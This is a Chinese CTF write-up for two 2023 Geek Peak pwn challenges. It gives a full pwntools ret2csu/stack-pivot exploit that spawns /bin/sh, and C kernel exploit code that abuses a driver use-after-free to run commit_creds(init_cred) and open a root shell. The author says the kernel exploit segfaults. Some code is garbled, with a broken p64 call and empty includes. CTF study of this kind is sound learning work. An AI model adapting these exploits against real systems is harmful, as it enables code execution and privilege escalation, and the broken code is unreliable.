2023 极客巅峰线上
linkmap
考点: 栈溢出+ret2csu+栈迁移
保护: 开了 Full RELRO 和 NX, 所以这里不能打 ret2dl
题目给了一些有用的函数:
在这个函数中, 我们可以把一个地址的数据存放到 BSS 段上.
漏洞利用
可以把一个 libc 地址比如 read@got 读取到 bss 上, 然后在修改其为 syscall. 后面就是栈迁移然后打 ret2syscall. 其中 rdx/rsi/rdi 通过 csu 都是可以控制的, 但是 rax 没有办法直接控制, 这里采用的方式是利用 read 函数的返回值去构造 rax = 0x3b.
exp 如下:
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'
io = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc
def debug():
gdb.attach(io)
pause()
sd = lambda s : io.send(s)
sda = lambda s, n : io.sendafter(s, n)
sl = lambda s : io.sendline(s)
sla = lambda s, n : io.sendlineafter(s, n)
rc = lambda n : io.recv(n)
rl = lambda : io.recvline()
rut = lambda s : io.recvuntil(s, drop=True)
ruf = lambda s : io.recvuntil(s, drop=False)
addr4 = lambda n : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8 = lambda n : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte = lambda n : str(n).encode()
info = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh = lambda : io.interactive()
menu = b''
#gdb.attach(io, 'b *0x000000000040076D')
pop_rdi = 0x00000000004007e3 # pop rdi ; ret
pop_rsi_r15 = 0x00000000004007e1 # pop rsi ; pop r15 ; ret
csu_f = 0x00000000004007DA
csu_e = 0x00000000004007C0
magic_func = 0x0000000000400606
read_got = 0x0000000000600FD8
leave_ret = 0x0000000000400712 # leave ; ret
call_read = 0x000000000040075E
def csu(call_func, rdi, rsi, rdx, ret_addr, rbp=0, flag=True):
pay = p64(0) + p64(1)
pay += p64(call_func) + p64(rdx) + p64(rsi) + p64(rdi) + p64(csu_e)
pay += p64(0)*2 + p64(rbp) + p64(0)*4
if flag:
pay += p64(ret_addr)
return pay
stack = 0x601050
pay = b'A'*0x10 + p64(0) + p64(csu_f) + csu(read_got, 0, stack, 0x100, leave_ret, stack-0x8)
info("pay len", len(pay))
sleep(0.1)
sd(pay)
pay = p64(pop_rdi) + p64(read_got) + p64(pop_rsi_r15) + p64(1)*2 + p64(magic_func)
pay += p64(csu_f) + csu(read_got, 0, 0x601028+0x100*8, 0x300, pop_rsi_r15, 0x601010) + p64(0x601020-0x8) + p64(0) + p64)
#pause()
sleep(0.1)
sd(pay)
#pause()
sleep(0.1)
sd(b'\xd0')
#pause()
# ==========
# 这个 pay 也行
#pay = p64(csu_f) + csu(read_got, 0, 0x601028+0x100*8+0x8, 0x3b, pop_rsi_r15, 0, False)
#pay += p64(csu_f) + csu(0x601028+0x100*8, 0x601028+0x100*8+0x8, 0, 0, 0)
# ==========
# 利用 read 函数构造 rax = 0x3b
pay = p64(csu_f) + p64(0) + p64(1)
pay += p64(read_got) + p64(0x3b) + p64(0x601028+0x100*8+8) + p64(0) + p64(csu_e)
pay += p64(0)*2 + p64(1)
pay += p64(0x601028+0x100*8) + p64(0)*2 + p64(0x601028+0x100*8+8) + p64(csu_e)
info("pay len", len(pay))
sleep(0.1)
sd(pay)
#pause()
sleep(0.1)
sd(b'/bin/sh'.ljust(0x3b, b'\x00'))
#debug()
sh()msg_msg
吐槽: 真是了, 一样的 exp, 我的打不通, 拿网上的妙通. 什么鬼啊, 操, 害我调了一下午, 4个多小时.
在非预期下算是一道入门题, 题目给了源码, 跟 babydriver 一样 close 时没有将指针置空导致 UAF.
UAF 堆块的大小为 0x32, 所以这里直接选择劫持 seq_operations, 最后打 pt_regs:) 难道pt_regs设置了偏移??? 但是拿网上的脚本没问题啊, 下面是我写的, 一直报段错误, 醉了.
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
#define MMSG_ALLOC 0x1111111
#define MMSG_COPY 0x2222222
#define MMSG_RECV 0x3333333
#define MMSG_UPDATE 0x4444444
#define MMSG_PUT_DESC 0x5555555
#define MMSG_GET_DESC 0x6666666
struct mmsg_arg {
unsigned long token;
int top;
int size;
char *data;
};
void set_desc(int fd, char* buf)
{
struct mmsg_arg arg = { .data = buf };
ioctl(fd, MMSG_PUT_DESC, &arg);
}
void get_desc(int fd, char* buf)
{
struct mmsg_arg arg = { .data = buf };
ioctl(fd, MMSG_GET_DESC, &arg);
}
size_t kernel_offset;
static size_t pop_rdi = 0xffffffff8144a9cd;
static size_t init_cred = 0xffffffff8264c9a0;
static size_t commit_creds = 0xffffffff8108d350;
static size_t add_rsp = 0xFFFFFFFF81909B8C;
static size_t swapgs_kpti = 0xFFFFFFFF81C00E54;
int main(int argc, char** argv, char** env)
{
char buf[0x100] = { 0 };
int fd[2];
for (int i = 0; i < 2; i++)
{
fd[i] = open("/dev/mmsg", O_RDWR);
if (fd[i] < 0) err_exit("FAILED ot open dev file");
}
close(fd[0]);
int seq_fd = open("/proc/self/stat", O_RDONLY);
if (seq_fd < 0) err_exit("FAILED to open seq file");
get_desc(fd[1], buf);
binary_dump("Leak data", buf, 0x20);
kernel_offset = *(uint64_t*)buf - 0xffffffff8120fac0;
hexx("kernel_offset", kernel_offset);
pop_rdi += kernel_offset;
init_cred += kernel_offset;
commit_creds += kernel_offset;
add_rsp += kernel_offset;
swapgs_kpti += kernel_offset;
*(uint64_t*)buf = add_rsp;
binary_dump("Write data", buf, 0x20);
set_desc(fd[1], buf);
__asm__(
"mov r14, pop_rdi;"
"mov r13, init_cred;"
"mov r12, commit_creds;"
"mov rbp, swapgs_kpti;"
);
read(seq_fd, buf, 8);
hexx("UID", getuid());
system("/bin/sh");
return 0;
} 效果如下: 不想搞了, 跟 babydriver 一样的, 别人能通, 我不行, 哎, 浪费4个小时
